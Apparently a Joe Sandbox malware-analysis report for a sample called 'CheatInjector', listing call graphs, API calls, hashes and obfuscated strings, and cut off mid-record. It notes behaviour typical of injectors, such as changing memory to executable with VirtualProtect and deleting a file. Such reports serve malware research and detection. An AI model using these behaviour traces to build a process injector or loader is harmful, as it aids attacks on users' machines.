___scrt_is_nonwritable_in_current_image 39901->39903 39902 4d6c5f 39942 4cb672 29 API calls _Deallocate 39902->39942 39903->39902 39905 4d6bf0 39903->39905 39911 4d6ba3 39903->39911 39912 4dc0e2 EnterCriticalSection 39905->39912 39907 4d6bf6 39908 4d6c13 39907->39908 39913 4d6c97 39907->39913 39941 4d6c57 LeaveCriticalSection __wsopen_s 39908->39941 39911->39880 39912->39907 39914 4d6cbc 39913->39914 39936 4d6cdf __wsopen_s 39913->39936 39915 4d6cc0 39914->39915 39917 4d6d1e 39914->39917 39916 4cb672 _Deallocate 29 API calls 39915->39916 39916->39936 39918 4d6d35 39917->39918 39919 4d8475 __wsopen_s 43 API calls 39917->39919 39920 4d67e4 __wsopen_s 42 API calls 39918->39920 39919->39918 39921 4d6d3f 39920->39921 39922 4d6d85 39921->39922 39923 4d6d45 39921->39923 39924 4d6d99 39922->39924 39925 4d6de8 WriteFile 39922->39925 39926 4d6d4c 39923->39926 39927 4d6d6f 39923->39927 39930 4d6dd6 39924->39930 39931 4d6da1 39924->39931 39928 4d6e0a GetLastError 39925->39928 39940 4d6d80 39925->39940 39934 4d677c __wsopen_s 6 API calls 39926->39934 39926->39936 39929 4d63aa __wsopen_s 47 API calls 39927->39929 39928->39940 39929->39940 39935 4d6862 __wsopen_s 7 API calls 39930->39935 39932 4d6dc4 39931->39932 39933 4d6da6 39931->39933 39938 4d6a26 __wsopen_s 8 API calls 39932->39938 39933->39936 39937 4d6daf 39933->39937 39934->39936 39935->39936 39936->39908 39939 4d693d __wsopen_s 7 API calls 39937->39939 39938->39940 39939->39936 39940->39936 39941->39911 39942->39911 39943->39884 39944->39889 39945->39891 39947 4d5f2d ___scrt_is_nonwritable_in_current_image 39946->39947 39955 4dc0e2 EnterCriticalSection 39947->39955 39949 4d5f3b 39950 4d5f6c 39949->39950 39956 4d6085 39949->39956 39969 4d5fa6 LeaveCriticalSection __wsopen_s 39950->39969 39953 4d5f8f 39953->39894 39954->39894 39955->39949 39957 4dc35e __wsopen_s 41 API calls 39956->39957 39959 4d6095 39957->39959 39958 4d609b 39961 4dc2cd __wsopen_s 15 API calls 39958->39961 39959->39958 39960 4d60cd 39959->39960 39962 4dc35e __wsopen_s 41 API calls 39959->39962 39960->39958 39963 4dc35e __wsopen_s 41 API calls 39960->39963 39968 4d60f3 __wsopen_s 39961->39968 39964 4d60c4 39962->39964 39965 4d60d9 CloseHandle 39963->39965 39966 4dc35e __wsopen_s 41 API calls 39964->39966 39965->39958 39967 4d60e5 GetLastError 39965->39967 39966->39960 39967->39958 39968->39950 39969->39953 39970->39705 39971->39703 39974 4c25e6 39972->39974 39973 4c2604 39973->39601 39974->39973 39981 4c4a6e 39974->39981 39989 4c5e2f 39976->39989 39978 4c27dc 39979 4c2795 39978->39979 39993 4c3ccb 43 API calls 2 library calls 39978->39993 39979->39600 39982 4c4a7a __EH_prolog3_catch 39981->39982 39983 4c4b1f CallUnexpected 39982->39983 39984 4c25d7 51 API calls 39982->39984 39983->39973 39987 4c4a99 39984->39987 39985 4c4b17 39986 4c27d4 51 API calls 39985->39986 39986->39983 39987->39985 39988 4c4022 43 API calls 39987->39988 39988->39985 39989->39978 39990 4c85fa 39989->39990 39994 4ca12c 8 API calls ___vcrt_FlsGetValue 39990->39994 39992 4c85ff 39992->39978 39993->39979 39994->39992 39996 4c503e __EH_prolog3_catch 39995->39996 39997 4c25d7 51 API calls 39996->39997 39998 4c5050 39997->39998 39999 4c4022 43 API calls 39998->39999 40000 4c50db 39999->40000 40001 4c27d4 51 API calls 40000->40001 40002 4c50e3 CallUnexpected 40001->40002 40002->39606 40004 4c4096 40003->40004 40006 4c40b2 40003->40006 40009 4c33a3 40004->40009 40006->39611 40008 4cbbec 71 API calls 40008->40006 40012 4c33bf 40009->40012 40014 4c33f1 40009->40014 40010 4c6b4c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40011 4c3409 40010->40011 40011->40008 40012->40014 40015 4ccc29 69 API calls _swprintf 40012->40015 40014->40010 40015->40014 40016->39626 40017 4c53a2 40018 4c53cc 40017->40018 40019 4c53ab 40017->40019 40019->40018 40022 4cbf30 40019->40022 40021 4c53bf 40023 4cbf42 40022->40023 40024 4cbf4b ___scrt_uninitialize_crt 40022->40024 40038 4cbdb4 70 API calls ___scrt_uninitialize_crt 40023->40038 40027 4cbf5c 40024->40027 40030 4cbd54 40024->40030 40026 4cbf48 40026->40021 40027->40021 40031 4cbd60 ___scrt_is_nonwritable_in_current_image 40030->40031 40039 4cba9f EnterCriticalSection 40031->40039 40033 4cbd6e 40040 4cbec2 40033->40040 40037 4cbd91 40037->40021 40038->40026 40039->40033 40041 4cbed7 _swprintf 40040->40041 40042 4cbede 40041->40042 40043 4cbee9 40041->40043 40054 4cbdb4 70 API calls ___scrt_uninitialize_crt 40042->40054 40045 4cbe59 ___scrt_uninitialize_crt 66 API calls 40043->40045 40047 4cbef3 40045->40047 40046 4cbee4 40048 4cb42b _swprintf 41 API calls 40046->40048 40047->40046 40050 4d5efa __fread_nolock 41 API calls 40047->40050 40049 4cbd7f 40048->40049 40053 4cbda8 LeaveCriticalSection __fread_nolock 40049->40053 40051 4cbf0a 40050->40051 40055 4d632d 45 API calls 3 library calls 40051->40055 40053->40037 40054->40046 40055->40046

                                                                Executed Functions

                                                                Function 004C59D6 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141memoryfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • DeleteFileA.KERNELBASE(static.lib), ref: 004C5AFD
                                                                • VirtualProtect.KERNELBASE(00541C58,000004E4,00000040,?), ref: 004C5B10
                                                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004C5B28
                                                                • HeapAlloc.KERNEL32(00000000), ref: 004C5B2B
                                                                • wsprintfA.USER32 ref: 004C5B3D
                                                                • GetStdHandle.KERNEL32(000000F5,00000000,00000000,00000000,00000000), ref: 004C5B4D
                                                                • WriteConsoleA.KERNEL32(00000000), ref: 004C5B54
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C5B5C
                                                                • HeapFree.KERNEL32(00000000), ref: 004C5B5F
                                                                  • Part of subcall function 004C22BB: _strlen.LIBCMT ref: 004C22D3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocConsoleDeleteFileFreeHandleProtectVirtualWrite_strlenwsprintf
                                                                • String ID: Window1$static.lib
                                                                • API String ID: 523815168-642987920
                                                                • Opcode ID: 25a792a77d356229106ade67c81a624ebf82db9c5252681839dfdc8f73f30161
                                                                • Instruction ID: 2c71ed8f28de05f661c239c9d1a541eb88bdb86c4e39253293efff8697e8b759
                                                                • Opcode Fuzzy Hash: 25a792a77d356229106ade67c81a624ebf82db9c5252681839dfdc8f73f30161
                                                                • Instruction Fuzzy Hash: 28416B356403506BD360FB62DC86F6F7758EF84B18F01452EFA05672C2DBB8AC04866D
                                                                Function 004E1228 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 004E0EE1: CreateFileW.KERNELBASE(?,00000000,?,004E12D1,?,?,00000000,?,004E12D1,?,0000000C), ref: 004E0EFE
                                                                • GetLastError.KERNEL32 ref: 004E133C
                                                                • __dosmaperr.LIBCMT ref: 004E1343
                                                                • GetFileType.KERNELBASE(00000000), ref: 004E134F
                                                                • GetLastError.KERNEL32 ref: 004E1359
                                                                • __dosmaperr.LIBCMT ref: 004E1362
                                                                • CloseHandle.KERNEL32(00000000), ref: 004E1382
                                                                • CloseHandle.KERNEL32(004DA86B), ref: 004E14CF
                                                                • GetLastError.KERNEL32 ref: 004E1501
                                                                • __dosmaperr.LIBCMT ref: 004E1508
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 1be23a42329826b8eda55ca2fac3a8717afa916c9682dc9ab5e778b1158924f1
                                                                • Instruction ID: f8b60a04cd96ba4e7268b27097007b37f96475267d17a2eebf2044d649a255a6
                                                                • Opcode Fuzzy Hash: 1be23a42329826b8eda55ca2fac3a8717afa916c9682dc9ab5e778b1158924f1
                                                                • Instruction Fuzzy Hash: 9BA14632A001949FCF199F69DC91BAE3BA1AB46325F14015FF8129F3E2C7388D52CB49
                                                                Function 004D6C97 Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 115 4d6c97-4d6cb6 116 4d6cbc-4d6cbe 115->116 117 4d6e90 115->117 118 4d6cea-4d6d10 116->118 119 4d6cc0-4d6cdf call 4cb672 116->119 120 4d6e92-4d6e96 117->120 121 4d6d16-4d6d1c 118->121 122 4d6d12-4d6d14 118->122 128 4d6ce2-4d6ce5 119->128 121->119 124 4d6d1e-4d6d28 121->124 122->121 122->124 126 4d6d38-4d6d43 call 4d67e4 124->126 127 4d6d2a-4d6d35 call 4d8475 124->127 133 4d6d85-4d6d97 126->133 134 4d6d45-4d6d4a 126->134 127->126 128->120 135 4d6d99-4d6d9f 133->135 136 4d6de8-4d6e08 WriteFile 133->136 137 4d6d4c-4d6d50 134->137 138 4d6d6f-4d6d83 call 4d63aa 134->138 142 4d6dd6-4d6de1 call 4d6862 135->142 143 4d6da1-4d6da4 135->143 139 4d6e0a-4d6e10 GetLastError 136->139 140 4d6e13 136->140 144 4d6e58-4d6e6a 137->144 145 4d6d56-4d6d65 call 4d677c 137->145 154 4d6d68-4d6d6a 138->154 139->140 147 4d6e16-4d6e21 140->147 160 4d6de6 142->160 148 4d6dc4-4d6dd4 call 4d6a26 143->148 149 4d6da6-4d6da9 143->149 150 4d6e6c-4d6e72 144->150 151 4d6e74-4d6e86 144->151 145->154 155 4d6e8b-4d6e8e 147->155 156 4d6e23-4d6e28 147->156 165 4d6dbf-4d6dc2 148->165 149->144 157 4d6daf-4d6dba call 4d693d 149->157 150->117 150->151 151->128 154->147 155->120 161 4d6e2a-4d6e2f 156->161 162 4d6e56 156->162 157->165 160->165 166 4d6e48-4d6e51 call 4d02d7 161->166 167 4d6e31-4d6e43 161->167 162->144 165->154 166->128 167->128
                                                                APIs
                                                                  • Part of subcall function 004D63AA: GetConsoleOutputCP.KERNEL32(A585592C,00000000,00000000,00000000), ref: 004D640D
                                                                • WriteFile.KERNEL32(?,00000000,?,004EDA30,00000000,0000000C,00000000,00000000,00000000,00000000,004EDA30,00000010,004CCBA0,00000000,00000000,00000000), ref: 004D6E00
                                                                • GetLastError.KERNEL32 ref: 004D6E0A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                • String ID:
                                                                • API String ID: 2915228174-0
                                                                • Opcode ID: 13d258be9ec2bc6de4d07f1498f1fa31ca219007ef8a9bf1e4912e3ffa52a04a
                                                                • Instruction ID: 1d2b99f8575f6a27b189524efea7f01b98097c9263959e050009199ef6c3cae4
                                                                • Opcode Fuzzy Hash: 13d258be9ec2bc6de4d07f1498f1fa31ca219007ef8a9bf1e4912e3ffa52a04a
                                                                • Instruction Fuzzy Hash: C761B875D00149AFDF11CFA8C854AEFBBB9AF1A308F15405BE800A7352D339D905DB69
                                                                Function 004D6862 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 170 4d6862-4d68b7 call 4c7a30 173 4d692c-4d693c call 4c6b4c 170->173 174 4d68b9 170->174 176 4d68bf 174->176 178 4d68c5-4d68c7 176->178 179 4d68c9-4d68ce 178->179 180 4d68e1-4d6906 WriteFile 178->180 181 4d68d7-4d68df 179->181 182 4d68d0-4d68d6 179->182 183 4d6908-4d6913 180->183 184 4d6924-4d692a GetLastError 180->184 181->178 181->180 182->181 183->173 185 4d6915-4d6920 183->185 184->173 185->176 186 4d6922 185->186 186->173
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,004D6DE6,00000000,00000000,00000000,?,0000000C,00000000), ref: 004D68FE
                                                                • GetLastError.KERNEL32(?,004D6DE6,00000000,00000000,00000000,?,0000000C,00000000,00000000,00000000,00000000,004EDA30,00000010,004CCBA0,00000000,00000000), ref: 004D6924
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID:
                                                                • API String ID: 442123175-0
                                                                • Opcode ID: b4489b2d8b7fcc528cf40dcc15a79a37270db183e3a1bbe1128b46bd49759084
                                                                • Instruction ID: 1c8f9299bf9ec085a093f6bca585c2a4509b9d3834669ef105559dc84d4bea4b
                                                                • Opcode Fuzzy Hash: b4489b2d8b7fcc528cf40dcc15a79a37270db183e3a1bbe1128b46bd49759084
                                                                • Instruction Fuzzy Hash: 7821DD34A002188BCF19CF29DD90AE9B7B9EB4D305F1540ABEA46D7311D730EE46CB68
                                                                Function 004D6085 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 187 4d6085-4d6099 call 4dc35e 190 4d609f-4d60a7 187->190 191 4d609b-4d609d 187->191 192 4d60a9-4d60b0 190->192 193 4d60b2-4d60b5 190->193 194 4d60ed-4d610d call 4dc2cd 191->194 192->193 195 4d60bd-4d60d1 call 4dc35e * 2 192->195 196 4d60b7-4d60bb 193->196 197 4d60d3-4d60e3 call 4dc35e CloseHandle 193->197 204 4d611f 194->204 205 4d610f-4d611d call 4d02d7 194->205 195->191 195->197 196->195 196->197 197->191 209 4d60e5-4d60eb GetLastError 197->209 207 4d6121-4d6124 204->207 205->207 209->194
                                                                APIs
                                                                • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,004D5F6C,00000000,CF830579,004ED9D0,0000000C,004D6028,004CBBC1,?), ref: 004D60DB
                                                                • GetLastError.KERNEL32(?,004D5F6C,00000000,CF830579,004ED9D0,0000000C,004D6028,004CBBC1,?), ref: 004D60E5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: CloseErrorHandleLast
                                                                • String ID:
                                                                • API String ID: 918212764-0
                                                                • Opcode ID: a591b8397ee576a2744f5d3f5d9c91d76850ce5e1e5b877d25b1e65a65aadd2f
                                                                • Instruction ID: 770c483f67d5018017c0682ae3be282124dc9523163772f9def9a8c89014ce00
                                                                • Opcode Fuzzy Hash: a591b8397ee576a2744f5d3f5d9c91d76850ce5e1e5b877d25b1e65a65aadd2f
                                                                • Instruction Fuzzy Hash: E8114C336001201AD6269635A86A77F678A4B83738F2A015FFA188B3D3DB7D9C4192DD
                                                                Function 004DA82C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 212 4da82c-4da852 call 4da602 215 4da8ab-4da8ae 212->215 216 4da854-4da866 call 4e1208 212->216 218 4da86b-4da870 216->218 218->215 219 4da872-4da8aa 218->219
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: __wsopen_s
                                                                • String ID:
                                                                • API String ID: 3347428461-0
                                                                • Opcode ID: 7aa95c47c5cf345d7876a2abda3ac313e4eba303860cb6f48f46fbe1a4fd66d7
                                                                • Instruction ID: 013a5dc686524d1ae6091d1e4fdaa05bf59c50a2787ddc94af137efc309273f8
                                                                • Opcode Fuzzy Hash: 7aa95c47c5cf345d7876a2abda3ac313e4eba303860cb6f48f46fbe1a4fd66d7
                                                                • Instruction Fuzzy Hash: E91127B1A0420AAFCF05DF59E94599B7BF4EF48304F0540AAF809EB351D670EE21DB69
                                                                Function 004E0EE1 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 220 4e0ee1-4e0f05 CreateFileW
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,00000000,?,004E12D1,?,?,00000000,?,004E12D1,?,0000000C), ref: 004E0EFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 69414b169ae342e23c8d93833f1f445c812eced72a68f052fcb8946ecb8645b0
                                                                • Instruction ID: 1c6feb17e29d615c4cc5d7a3ce538d789d06fb25f611d18caa8fdcb794d1696e
                                                                • Opcode Fuzzy Hash: 69414b169ae342e23c8d93833f1f445c812eced72a68f052fcb8946ecb8645b0
                                                                • Instruction Fuzzy Hash: 44D06C3200014DBBDF029F84DC46EDA3BAAFB88714F024010BA5856020C732E861AB94

                                                                Non-executed Functions

                                                                Function 0050E780 Relevance: 24.0, Strings: 18, Instructions: 1484COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #"! $(?$7;$?>=<$@C$H$KJUT$LMNO$ONML$SRQI$X$XwRU$`abc$cba`$defg$pq$t${V{f
                                                                • API String ID: 0-3575642536
                                                                • Opcode ID: c8622f186b12052b3f0e24b3001c016381c2fc62e28ee15d5082906d0c0aa3a2
                                                                • Instruction ID: fc9c4a679959009775b31687695ed474fa786347469f73f6f0beb6331f0844f1
                                                                • Opcode Fuzzy Hash: c8622f186b12052b3f0e24b3001c016381c2fc62e28ee15d5082906d0c0aa3a2
                                                                • Instruction Fuzzy Hash: 33B2CB715083918BE734CF24C8917AFBBE1BFD6304F18892DE5D98B292D7758809CB92
                                                                Function 004EF705 Relevance: 16.0, Strings: 12, Instructions: 987COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                • API String ID: 0-3385986306
                                                                • Opcode ID: d86bc0c62936ab3f077081756a3f5d61ebf2613bed4064e578ebdf0d8516f2ca
                                                                • Instruction ID: be50214a637f4448a0460a0484ab7a9544acd0b8f58b804336ab2b6fbd35f87d
                                                                • Opcode Fuzzy Hash: d86bc0c62936ab3f077081756a3f5d61ebf2613bed4064e578ebdf0d8516f2ca
                                                                • Instruction Fuzzy Hash: 6E82D4756093858FD718CF18C58072BBBE1ABC5304F188A6EE6D997392D378DD05CB8A
                                                                Function 00510D50 Relevance: 15.7, Strings: 12, Instructions: 730COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )M6C$)Q1W$1Ujk$2E%[$C1H7$E!R'$G57K$KJUT$KJUT$N9A?$X)K/$a-P#
                                                                • API String ID: 0-2247652027
                                                                • Opcode ID: bfab3cad39060bbb8d57d453e409f27ca7a4b9ae122920e2e0dea05f4994554e
                                                                • Instruction ID: fcac44cc12aa75659caf5eb38269e9927cea7ad27844825c245d8fa39497b309
                                                                • Opcode Fuzzy Hash: bfab3cad39060bbb8d57d453e409f27ca7a4b9ae122920e2e0dea05f4994554e
                                                                • Instruction Fuzzy Hash: E132EE756087419BE720CF11D881BABBBE2FBD5744F19882CE6859B291D730EC81CB96
                                                                Function 00529460 Relevance: 15.3, Strings: 12, Instructions: 297COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
